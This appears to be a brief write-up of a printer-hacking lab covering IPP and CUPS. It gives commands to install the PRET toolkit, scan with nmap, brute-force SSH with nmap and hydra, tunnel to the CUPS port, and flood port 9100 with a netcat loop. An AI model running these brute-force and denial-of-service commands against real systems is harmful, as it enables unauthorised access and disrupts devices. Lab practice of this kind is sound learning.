Learn about (and get hands on with) printer hacking and understand the basics of IPP.
install this toolkit to exploit local network printer
git clone https://github.com/RUB-NDS/PRET && cd PRET
python2 -m pip install colorama pysnmP
automatic printer discovery
python pret.py
scan the machine
nmap -sS -T4
i found 2 services are ipp and ssh
CUPS open source print server uses IPP protocol for print management
In tab printers, you can see list of printers
click on that printer, you can see size of a test sheet
brute force the password using nmap to know username printer
and hydra to password
nmap -p 22 --script ssh-brute --script-args userdb=user.txt
hydra -l printer -P /usr/share/wordlists/rockyou.txt ssh://
then connect ssh to machine through a tunnel
ssh [email protected] -T -L 3631:localhost:631
now you can using cheatsheet to do a ddos attack or whatever you want
while true; do nc printer 9100; done